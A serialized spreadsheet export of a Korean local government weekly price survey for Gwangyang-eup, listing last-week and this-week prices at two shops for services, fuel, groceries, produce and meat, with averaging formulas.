[29,"의복수선료","신사복 바지\n밑단줄임 1회",{"$f":"COUNTIF(J64,\"<>0\")+COUNTIF(N64,\"<>0\")","v":2},{"$f":"COUNTIF(K64,\"<>0\")+COUNTIF(O64,\"<>0\")","v":2},{"$f":"IF(D64=0,0,SUM(J64,N64)/D64)","v":{"v":4500,"d":"4,500"}},{"$f":"IF(E64=0,0,SUM(K64,O64)/E64)","v":{"v":4500,"d":"4,500"}},{"$f":"G64-F64","v":0},"서울세탁소",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"K64-J64","v":0},"때빼때세탁소",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},{"$f":"O64-N64","v":0}]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",{"$f":"COUNTIF(J65,\"<>0\")+COUNTIF(N65,\"<>0\")","v":1},{"$f":"COUNTIF(K65,\"<>0\")+COUNTIF(O65,\"<>0\")","v":1},{"$f":"IF(D65=0,0,SUM(J65,N65)/D65)","v":{"v":13000,"d":"13,000"}},{"$f":"IF(E65=0,0,SUM(K65,O65)/E65)","v":{"v":13000,"d":"13,000"}},{"$f":"G65-F65","v":0},null,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},{"$f":"K65-J65","v":0},null,0,0,{"$f":"O65-N65","v":0}]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",{"$f":"COUNTIF(J66,\"<>0\")+COUNTIF(N66,\"<>0\")","v":0},{"$f":"COUNTIF(K66,\"<>0\")+COUNTIF(O66,\"<>0\")","v":0},{"$f":"IF(D66=0,0,SUM(J66,N66)/D66)","v":0},{"$f":"IF(E66=0,0,SUM(K66,O66)/E66)","v":0},{"$f":"G66-F66","v":0},null,"0","0",{"$f":"K66-J66","v":0},null,0,0,{"$f":"O66-N66","v":0}]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",{"$f":"COUNTIF(J67,\"<>0\")+COUNTIF(N67,\"<>0\")","v":1},{"$f":"COUNTIF(K67,\"<>0\")+COUNTIF(O67,\"<>0\")","v":1},{"$f":"IF(D67=0,0,SUM(J67,N67)/D67)","v":{"v":3500,"d":"3,500"}},{"$f":"IF(E67=0,0,SUM(K67,O67)/E67)","v":{"v":3500,"d":"3,500"}},{"$f":"G67-F67","v":0},"광양수영장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},{"$f":"K67-J67","v":0},null,0,0,{"$f":"O67-N67","v":0}]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",{"$f":"COUNTIF(J68,\"<>0\")+COUNTIF(N68,\"<>0\")","v":1},{"$f":"COUNTIF(K68,\"<>0\")+COUNTIF(O68,\"<>0\")","v":1},{"$f":"IF(D68=0,0,SUM(J68,N68)/D68)","v":{"v":4000,"d":"4,000"}},{"$f":"IF(E68=0,0,SUM(K68,O68)/E68)","v":{"v":4000,"d":"4,000"}},{"$f":"G68-F68","v":0},"월드볼링장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"K68-J68","v":0},null,0,0,{"$f":"O68-N68","v":0}]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",{"$f":"COUNTIF(J69,\"<>0\")+COUNTIF(N69,\"<>0\")","v":1},{"$f":"COUNTIF(K69,\"<>0\")+COUNTIF(O69,\"<>0\")","v":1},{"$f":"IF(D69=0,0,SUM(J69,N69)/D69)","v":{"v":100000,"d":"100,000"}},{"$f":"IF(E69=0,0,SUM(K69,O69)/E69)","v":{"v":100000,"d":"100,000"}},{"$f":"G69-F69","v":0},"창성골프연습장",{"v":100000,"d":"100,000"},{"v":100000,"d":"100,000"},{"$f":"K69-J69","v":0},null,0,0,{"$f":"O69-N69","v":0}]
[35,"노래방\n이용료","일반인 저녁 1시간",{"$f":"COUNTIF(J70,\"<>0\")+COUNTIF(N70,\"<>0\")","v":2},{"$f":"COUNTIF(K70,\"<>0\")+COUNTIF(O70,\"<>0\")","v":2},{"$f":"IF(D70=0,0,SUM(J70,N70)/D70)","v":{"v":25000,"d":"25,000"}},{"$f":"IF(E70=0,0,SUM(K70,O70)/E70)","v":{"v":25000,"d":"25,000"}},{"$f":"G70-F70","v":0},"매화노래방",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},{"$f":"K70-J70","v":0},"고래고래노래방",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},{"$f":"O70-N70","v":0}]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",{"$f":"COUNTIF(J71,\"<>0\")+COUNTIF(N71,\"<>0\")","v":2},{"$f":"COUNTIF(K71,\"<>0\")+COUNTIF(O71,\"<>0\")","v":2},{"$f":"IF(D71=0,0,SUM(J71,N71)/D71)","v":{"v":9000,"d":"9,000"}},{"$f":"IF(E71=0,0,SUM(K71,O71)/E71)","v":{"v":9000,"d":"9,000"}},{"$f":"G71-F71","v":0},"퀸당구장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"K71-J71","v":0},"굿당당구장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"O71-N71","v":0}]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",{"$f":"COUNTIF(J72,\"<>0\")+COUNTIF(N72,\"<>0\")","v":2},{"$f":"COUNTIF(K72,\"<>0\")+COUNTIF(O72,\"<>0\")","v":2},{"$f":"IF(D72=0,0,SUM(J72,N72)/D72)","v":{"v":22500,"d":"22,500"}},{"$f":"IF(E72=0,0,SUM(K72,O72)/E72)","v":{"v":22500,"d":"22,500"}},{"$f":"G72-F72","v":0},"니콘사진관",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},{"$f":"K72-J72","v":0},"신가스튜디오",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},{"$f":"O72-N72","v":0}]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",{"$f":"COUNTIF(J73,\"<>0\")+COUNTIF(N73,\"<>0\")","v":2},{"$f":"COUNTIF(K73,\"<>0\")+COUNTIF(O73,\"<>0\")","v":2},{"$f":"IF(D73=0,0,SUM(J73,N73)/D73)","v":400},{"$f":"IF(E73=0,0,SUM(K73,O73)/E73)","v":400},{"$f":"G73-F73","v":0},"니콘사진관",300,300,{"$f":"K73-J73","v":0},"신가스튜디오",500,500,{"$f":"O73-N73","v":0}]
[39,"영상매체대여료","최신판 영화 DVD대여요금",{"$f":"COUNTIF(J74,\"<>0\")+COUNTIF(N74,\"<>0\")","v":0},{"$f":"COUNTIF(K74,\"<>0\")+COUNTIF(O74,\"<>0\")","v":0},{"$f":"IF(D74=0,0,SUM(J74,N74)/D74)","v":0},{"$f":"IF(E74=0,0,SUM(K74,O74)/E74)","v":0},{"$f":"G74-F74","v":0},null,"0","0",{"$f":"K74-J74","v":0},null,"0","0",{"$f":"O74-N74","v":0}]
[40,"이용료(컷트)","성인조발 중류급 1회",{"$f":"COUNTIF(J75,\"<>0\")+COUNTIF(N75,\"<>0\")","v":2},{"$f":"COUNTIF(K75,\"<>0\")+COUNTIF(O75,\"<>0\")","v":2},{"$f":"IF(D75=0,0,SUM(J75,N75)/D75)","v":{"v":15000,"d":"15,000"}},{"$f":"IF(E75=0,0,SUM(K75,O75)/E75)","v":{"v":15000,"d":"15,000"}},{"$f":"G75-F75","v":0},"광양이용원",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},{"$f":"K75-J75","v":0},"늘푸른이용원",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},{"$f":"O75-N75","v":0}]
[41,"미용료","성인여자 파마(일반)",{"$f":"COUNTIF(J76,\"<>0\")+COUNTIF(N76,\"<>0\")","v":2},{"$f":"COUNTIF(K76,\"<>0\")+COUNTIF(O76,\"<>0\")","v":2},{"$f":"IF(D76=0,0,SUM(J76,N76)/D76)","v":{"v":45000,"d":"45,000"}},{"$f":"IF(E76=0,0,SUM(K76,O76)/E76)","v":{"v":45000,"d":"45,000"}},{"$f":"G76-F76","v":0},"리헤어피카소",{"v":50000,"d":"50,000"},{"v":50000,"d":"50,000"},{"$f":"K76-J76","v":0},"지샾미용실",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},{"$f":"O76-N76","v":0}]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",{"$f":"COUNTIF(J77,\"<>0\")+COUNTIF(N77,\"<>0\")","v":2},{"$f":"COUNTIF(K77,\"<>0\")+COUNTIF(O77,\"<>0\")","v":2},{"$f":"IF(D77=0,0,SUM(J77,N77)/D77)","v":{"v":7000,"d":"7,000"}},{"$f":"IF(E77=0,0,SUM(K77,O77)/E77)","v":{"v":7000,"d":"7,000"}},{"$f":"G77-F77","v":0},"삼보천",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"K77-J77","v":0},"밭샘사우나",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O77-N77","v":0}]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",{"$f":"COUNTIF(J78,\"<>0\")+COUNTIF(N78,\"<>0\")","v":0},{"$f":"COUNTIF(K78,\"<>0\")+COUNTIF(O78,\"<>0\")","v":0},{"$f":"IF(D78=0,0,SUM(J78,N78)/D78)","v":0},{"$f":"IF(E78=0,0,SUM(K78,O78)/E78)","v":0},{"$f":"G78-F78","v":0},null,0,0,{"$f":"K78-J78","v":0},null,0,0,{"$f":"O78-N78","v":0}]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",{"$f":"COUNTIF(J79,\"<>0\")+COUNTIF(N79,\"<>0\")","v":2},{"$f":"COUNTIF(K79,\"<>0\")+COUNTIF(O79,\"<>0\")","v":2},{"$f":"IF(D79=0,0,SUM(J79,N79)/D79)","v":{"v":37500,"d":"37,500"}},{"$f":"IF(E79=0,0,SUM(K79,O79)/E79)","v":{"v":37500,"d":"37,500"}},{"$f":"G79-F79","v":0},"대산모텔",{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},{"$f":"K79-J79","v":0},"타워모텔",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},{"$f":"O79-N79","v":0}]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",{"$f":"COUNTIF(J80,\"<>0\")+COUNTIF(N80,\"<>0\")","v":0},{"$f":"COUNTIF(K80,\"<>0\")+COUNTIF(O80,\"<>0\")","v":0},{"$f":"IF(D80=0,0,SUM(J80,N80)/D80)","v":0},{"$f":"IF(E80=0,0,SUM(K80,O80)/E80)","v":0},{"$f":"G80-F80","v":0},null,"0","0",{"$f":"K80-J80","v":0},null,"0","0",{"$f":"O80-N80","v":0}]
[46,"PC방\n이용료","1회 이용시",{"$f":"COUNTIF(J81,\"<>0\")+COUNTIF(N81,\"<>0\")","v":2},{"$f":"COUNTIF(K81,\"<>0\")+COUNTIF(O81,\"<>0\")","v":2},{"$f":"IF(D81=0,0,SUM(J81,N81)/D81)","v":{"v":1350,"d":"1,350"}},{"$f":"IF(E81=0,0,SUM(K81,O81)/E81)","v":{"v":1350,"d":"1,350"}},{"$f":"G81-F81","v":0},"미스터케이PC",{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},{"$f":"K81-J81","v":0},"아이센스PC방",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},{"$f":"O81-N81","v":0}]
[47,"택배이용료","20kg이하, 타지역",{"$f":"COUNTIF(J82,\"<>0\")+COUNTIF(N82,\"<>0\")","v":2},{"$f":"COUNTIF(K82,\"<>0\")+COUNTIF(O82,\"<>0\")","v":2},{"$f":"IF(D82=0,0,SUM(J82,N82)/D82)","v":{"v":6000,"d":"6,000"}},{"$f":"IF(E82=0,0,SUM(K82,O82)/E82)","v":{"v":6000,"d":"6,000"}},{"$f":"G82-F82","v":0},"건영택배",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},{"$f":"K82-J82","v":0},"현대택배",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},{"$f":"O82-N82","v":0}]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",{"$f":"COUNTIF(J83,\"<>0\")+COUNTIF(N83,\"<>0\")","v":0},{"$f":"COUNTIF(K83,\"<>0\")+COUNTIF(O83,\"<>0\")","v":0},{"$f":"IF(D83=0,0,SUM(J83,N83)/D83)","v":0},{"$f":"IF(E83=0,0,SUM(K83,O83)/E83)","v":0},{"$f":"G83-F83","v":0},null,"0","0",{"$f":"K83-J83","v":0},null,"0","0",{"$f":"O83-N83","v":0}]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",{"$f":"COUNTIF(J84,\"<>0\")+COUNTIF(N84,\"<>0\")","v":0},{"$f":"COUNTIF(K84,\"<>0\")+COUNTIF(O84,\"<>0\")","v":0},{"$f":"IF(D84=0,0,SUM(J84,N84)/D84)","v":0},{"$f":"IF(E84=0,0,SUM(K84,O84)/E84)","v":0},{"$f":"G84-F84","v":0},null,"0","0",{"$f":"K84-J84","v":0},null,"0","0",{"$f":"O84-N84","v":0}]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},{"$f":"COUNTIF(K86,\"<>0\")+COUNTIF(O86,\"<>0\")","v":2},{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":{"v":5470,"d":"5,470"}},{"$f":"IF(E86=0,0,SUM(K86,O86)/E86)","v":{"v":5470,"d":"5,470"}},{"$f":"G86-F86","v":0},"농협하나로마트",{"v":5350,"d":"5,350"},{"v":5350,"d":"5,350"},{"$f":"K86-J86","v":0},"트라이얼코리아",{"v":5590,"d":"5,590"},{"v":5590,"d":"5,590"},{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",{"$f":"COUNTIF(J87,\"<>0\")+COUNTIF(N87,\"<>0\")","v":1},{"$f":"COUNTIF(K87,\"<>0\")+COUNTIF(O87,\"<>0\")","v":1},{"$f":"IF(D87=0,0,SUM(J87,N87)/D87)","v":{"v":1450,"d":"1,450"}},{"$f":"IF(E87=0,0,SUM(K87,O87)/E87)","v":{"v":1450,"d":"1,450"}},{"$f":"G87-F87","v":0},"농협하나로마트",0,0,{"$f":"K87-J87","v":0},"트라이얼코리아",{"v":1450,"d":"1,450"},{"v":1450,"d":"1,450"},{"$f":"O87-N87","v":0}]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",{"$f":"COUNTIF(J88,\"<>0\")+COUNTIF(N88,\"<>0\")","v":2},{"$f":"COUNTIF(K88,\"<>0\")+COUNTIF(O88,\"<>0\")","v":2},{"$f":"IF(D88=0,0,SUM(J88,N88)/D88)","v":990},{"$f":"IF(E88=0,0,SUM(K88,O88)/E88)","v":990},{"$f":"G88-F88","v":0},"농협하나로마트",990,990,{"$f":"K88-J88","v":0},"트라이얼코리아",990,990,{"$f":"O88-N88","v":0}]
[4,"식용유","콩기름 1.8ml",{"$f":"COUNTIF(J89,\"<>0\")+COUNTIF(N89,\"<>0\")","v":2},{"$f":"COUNTIF(K89,\"<>0\")+COUNTIF(O89,\"<>0\")","v":2},{"$f":"IF(D89=0,0,SUM(J89,N89)/D89)","v":{"v":8485,"d":"8,485"}},{"$f":"IF(E89=0,0,SUM(K89,O89)/E89)","v":{"v":8485,"d":"8,485"}},{"$f":"G89-F89","v":0},"농협하나로마트",{"v":8480,"d":"8,480"},{"v":8480,"d":"8,480"},{"$f":"K89-J89","v":0},"트라이얼코리아",{"v":8490,"d":"8,490"},{"v":8490,"d":"8,490"},{"$f":"O89-N89","v":0}]
[5,"설탕","정백당 1kg",{"$f":"COUNTIF(J90,\"<>0\")+COUNTIF(N90,\"<>0\")","v":2},{"$f":"COUNTIF(K90,\"<>0\")+COUNTIF(O90,\"<>0\")","v":2},{"$f":"IF(D90=0,0,SUM(J90,N90)/D90)","v":{"v":1835,"d":"1,835"}},{"v":1835,"d":"1,835"},{"$f":"G90-F90","v":0},"농협하나로마트",{"v":1780,"d":"1,780"},{"v":1780,"d":"1,780"},{"$f":"K90-J90","v":0},"트라이얼코리아",{"v":1890,"d":"1,890"},{"v":1890,"d":"1,890"},{"$f":"O90-N90","v":0}]
[6,"생수","플라스틱 1병(500㎖)",{"$f":"COUNTIF(J91,\"<>0\")+COUNTIF(N91,\"<>0\")","v":2},{"$f":"COUNTIF(K91,\"<>0\")+COUNTIF(O91,\"<>0\")","v":2},{"$f":"IF(D91=0,0,SUM(J91,N91)/D91)","v":320},{"$f":"IF(E91=0,0,SUM(K91,O91)/E91)","v":320},{"$f":"G91-F91","v":0},"농협하나로마트",250,250,{"$f":"K91-J91","v":0},"트라이얼코리아",390,390,{"$f":"O91-N91","v":0}]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",{"$f":"COUNTIF(J92,\"<>0\")+COUNTIF(N92,\"<>0\")","v":2},{"$f":"COUNTIF(K92,\"<>0\")+COUNTIF(O92,\"<>0\")","v":2},{"$f":"IF(D92=0,0,SUM(J92,N92)/D92)","v":{"v":1540,"d":"1,540"}},{"$f":"IF(E92=0,0,SUM(K92,O92)/E92)","v":{"v":1540,"d":"1,540"}},{"$f":"G92-F92","v":0},"농협하나로마트",{"v":1540,"d":"1,540"},{"v":1540,"d":"1,540"},{"$f":"K92-J92","v":0},"트라이얼코리아",{"v":1540,"d":"1,540"},{"v":1540,"d":"1,540"},{"$f":"O92-N92","v":0}]
[8,"소주","1병 360㎖\n(병 보증금 포함)",{"$f":"COUNTIF(J93,\"<>0\")+COUNTIF(N93,\"<>0\")","v":2},{"$f":"COUNTIF(K93,\"<>0\")+COUNTIF(O93,\"<>0\")","v":2},{"$f":"IF(D93=0,0,SUM(J93,N93)/D93)","v":{"v":1380,"d":"1,380"}},{"$f":"IF(E93=0,0,SUM(K93,O93)/E93)","v":{"v":1405,"d":"1,405"}},{"$f":"G93-F93","v":25},"농협하나로마트",{"v":1380,"d":"1,380"},{"v":1430,"d":"1,430"},{"$f":"K93-J93","v":50},"트라이얼코리아",{"v":1380,"d":"1,380"},{"v":1380,"d":"1,380"},{"$f":"O93-N93","v":0}]
[9,"등유","주유소 판매 1ℓ",{"$f":"COUNTIF(J94,\"<>0\")+COUNTIF(N94,\"<>0\")","v":2},{"$f":"COUNTIF(K94,\"<>0\")+COUNTIF(O94,\"<>0\")","v":2},{"$f":"IF(D94=0,0,SUM(J94,N94)/D94)","v":{"v":1400,"d":"1,400"}},{"$f":"IF(E94=0,0,SUM(K94,O94)/E94)","v":{"v":1400,"d":"1,400"}},{"$f":"G94-F94","v":0},"역전주유소",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},{"$f":"K94-J94","v":0},"황금주유소",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},{"$f":"O94-N94","v":0}]
[10,"경유","주유소 판매 1ℓ",{"$f":"COUNTIF(J95,\"<>0\")+COUNTIF(N95,\"<>0\")","v":2},{"$f":"COUNTIF(K95,\"<>0\")+COUNTIF(O95,\"<>0\")","v":2},{"$f":"IF(D95=0,0,SUM(J95,N95)/D95)","v":{"v":1527,"d":"1,527"}},{"$f":"IF(E95=0,0,SUM(K95,O95)/E95)","v":{"v":1527,"d":"1,527"}},{"$f":"G95-F95","v":0},"역전주유소",{"v":1525,"d":"1,525"},{"v":1525,"d":"1,525"},{"$f":"K95-J95","v":0},"황금주유소",{"v":1529,"d":"1,529"},{"v":1529,"d":"1,529"},{"$f":"O95-N95","v":0}]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",{"$f":"COUNTIF(J96,\"<>0\")+COUNTIF(N96,\"<>0\")","v":2},{"$f":"COUNTIF(K96,\"<>0\")+COUNTIF(O96,\"<>0\")","v":2},{"$f":"IF(D96=0,0,SUM(J96,N96)/D96)","v":{"v":1642,"d":"1,642"}},{"$f":"IF(E96=0,0,SUM(K96,O96)/E96)","v":{"v":1642,"d":"1,642"}},{"$f":"G96-F96","v":0},"역전주유소",{"v":1645,"d":"1,645"},{"v":1645,"d":"1,645"},{"$f":"K96-J96","v":0},"황금주유소",{"v":1639,"d":"1,639"},{"v":1639,"d":"1,639"},{"$f":"O96-N96","v":0}]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",{"$f":"COUNTIF(J97,\"<>0\")+COUNTIF(N97,\"<>0\")","v":2},{"$f":"COUNTIF(K97,\"<>0\")+COUNTIF(O97,\"<>0\")","v":2},{"$f":"IF(D97=0,0,SUM(J97,N97)/D97)","v":{"v":130000,"d":"130,000"}},{"$f":"IF(E97=0,0,SUM(K97,O97)/E97)","v":{"v":130000,"d":"130,000"}},{"$f":"G97-F97","v":0},"믿음음악학원",{"v":130000,"d":"130,000"},{"v":130000,"d":"130,000"},{"$f":"K97-J97","v":0},"에쎌피아노",{"v":130000,"d":"130,000"},{"v":130000,"d":"130,000"},{"$f":"O97-N97","v":0}]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",{"$f":"COUNTIF(J98,\"<>0\")+COUNTIF(N98,\"<>0\")","v":2},{"$f":"COUNTIF(K98,\"<>0\")+COUNTIF(O98,\"<>0\")","v":2},{"$f":"IF(D98=0,0,SUM(J98,N98)/D98)","v":{"v":145000,"d":"145,000"}},{"$f":"IF(E98=0,0,SUM(K98,O98)/E98)","v":{"v":145000,"d":"145,000"}},{"$f":"G98-F98","v":0},"아트하트학원",{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},{"$f":"K98-J98","v":0},"아이피카소",{"v":140000,"d":"140,000"},{"v":140000,"d":"140,000"},{"$f":"O98-N98","v":0}]

{"sheet":"광양읍2","index":2,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(광양읍)"]
[{"$nulls":12},"조사자 : 김국희"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(광양마트)",{"$nulls":3},"조 사 2 지 역(시장)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주",null,"증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg(광양좋은쌀)",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":{"v":53500,"d":"53,500"}},{"$f":"IF(E7=0,0,SUM(K7,O7)/E7)","v":{"v":53500,"d":"53,500"}},{"$f":"G7-F7","v":0},"광양마트",{"v":55000,"d":"55,000"},{"v":55000,"d":"55,000"},{"$f":"K7-J7","v":0},"시장",{"v":52000,"d":"52,000"},{"v":52000,"d":"52,000"},{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},2,{"$f":"IF(D8=0,0,SUM(J8,N8)/D8)","v":{"v":2150,"d":"2,150"}},{"v":2000,"d":"2,000"},{"$f":"G8-F8","v":-150},"광양마트",{"v":2300,"d":"2,300"},{"v":2000,"d":"2,000"},{"$f":"K8-J8","v":-300},"시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},{"$f":"O8-N8","v":0}]
[3,"상추","잎상추 500g",2,2,{"v":4500,"d":"4,500"},{"v":4250,"d":"4,250"},{"$f":"G9-F9","v":-250},"광양마트",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,"시장",{"v":4000,"d":"4,000"},{"v":3500,"d":"3,500"},-500]
[4,"양상추","상품1개(350~400g)",2,2,{"v":1950,"d":"1,950"},{"v":1950,"d":"1,950"},{"$f":"G10-F10","v":0},"로컬푸드",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0,"시장",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0]
[5,"애호박","상품1개(300~350g)",2,2,{"v":2350,"d":"2,350"},{"v":1950,"d":"1,950"},{"$f":"G11-F11","v":-400},"광양마트",{"v":2700,"d":"2,700"},{"v":1900,"d":"1,900"},-800,"시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[6,"열무","상품 4kg(1단)",1,1,0,0,{"$f":"G12-F12","v":0},"광양마트",null,null,0,"시장",0,0,0]
[7,"양파","1망 1kg",2,2,{"v":3400,"d":"3,400"},{"v":2950,"d":"2,950"},{"$f":"G13-F13","v":-450},"광양마트",{"v":3800,"d":"3,800"},{"v":3900,"d":"3,900"},100,"시장",{"v":3000,"d":"3,000"},{"v":2000,"d":"2,000"},{"v":-1000,"d":"-1,000"}]
[8,"오이","상품 3개",2,2,{"v":3950,"d":"3,950"},{"v":3000,"d":"3,000"},-950,"광양마트",{"v":3900,"d":"3,900"},{"v":3000,"d":"3,000"},-900,"시장",{"v":4000,"d":"4,000"},{"v":3000,"d":"3,000"},{"v":-1000,"d":"-1,000"}]
[9,"풋고추","신선한것 1kg",2,2,{"v":12000,"d":"12,000"},{"v":8500,"d":"8,500"},{"v":-3500,"d":"-3,500"},"광양마트(청양)",{"v":12000,"d":"12,000"},{"v":10000,"d":"10,000"},{"v":-2000,"d":"-2,000"},"시장",{"v":12000,"d":"12,000"},{"v":7000,"d":"7,000"},{"v":-5000,"d":"-5,000"}]
[10,"마늘","깐것 상품 1kg",2,2,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"광양마트",{"v":16000,"d":"16,000"},{"v":16000,"d":"16,000"},0,"시장",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[11,"감자","흰색 1kg",2,2,{"v":7000,"d":"7,000"},{"v":6500,"d":"6,500"},-500,"광양마트",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"시장",{"v":6000,"d":"6,000"},{"v":5000,"d":"5,000"},{"v":-1000,"d":"-1,000"}]
[12,"배추","1포기 3kg",{"$f":"COUNTIF(J18,\"<>0\")+COUNTIF(N18,\"<>0\")","v":2},2,{"v":1650,"d":"1,650"},{"v":2000,"d":"2,000"},350,"광양마트",null,null,0,"시장",{"v":3300,"d":"3,300"},{"v":4000,"d":"4,000"},700]
[13,"콩나물","1봉지 500g ",2,2,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"광양마트",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[14,"사과","상품 1개(300∼350g)",2,2,{"v":2250,"d":"2,250"},{"v":2250,"d":"2,250"},0,"광양마트",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"시장",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0]
[15,"배","상품 1개(650∼700g)",2,2,{"v":3250,"d":"3,250"},{"v":3375,"d":"3,375"},125,"광양마트",{"v":3500,"d":"3,500"},{"v":3750,"d":"3,750"},250,"시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[16,"바나나","상품 1kg",2,2,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"광양마트",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[17,"쇠고기\n(한우)","등심 600g(상등육)",1,1,{"v":60000,"d":"60,000"},{"v":60000,"d":"60,000"},0,"광양마트",0,0,0,"시장(정육점)",{"v":60000,"d":"60,000"},{"v":60000,"d":"60,000"},0]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",2,2,{"v":27900,"d":"27,900"},{"v":27900,"d":"27,900"},0,"광양마트",{"v":40800,"d":"40,800"},{"v":40800,"d":"40,800"},0,"시장(정육점)",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[19,"돼지고기","삼겹살 600g(상등육)",2,2,{"v":16160,"d":"16,160"},{"v":17100,"d":"17,100"},940,"광양마트",{"v":16320,"d":"16,320"},{"v":16200,"d":"16,200"},-120,"시장(정육점)",{"v":16000,"d":"16,000"},{"v":18000,"d":"18,000"},{"v":2000,"d":"2,000"}]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,{"v":8750,"d":"8,750"},{"v":8750,"d":"8,750"},0,"광양마트",{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},{"$f":"K26-J26","v":0},"시장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[21,"달걀","특란 30개 한판",2,2,{"v":7850,"d":"7,850"},{"v":7750,"d":"7,750"},-100,"광양마트",{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},0,"시장",{"v":7200,"d":"7,200"},{"v":7000,"d":"7,000"},-200]
[22,"조기","15cm 1마리",{"$f":"COUNTIF(J28,\"<>0\")+COUNTIF(N28,\"<>0\")","v":2},2,{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"광양마트",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"시장",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0]
[23,"갈치","60cm 1마리",2,2,{"v":11500,"d":"11,500"},{"v":11500,"d":"11,500"},0,"광양마트",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"시장",{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0]
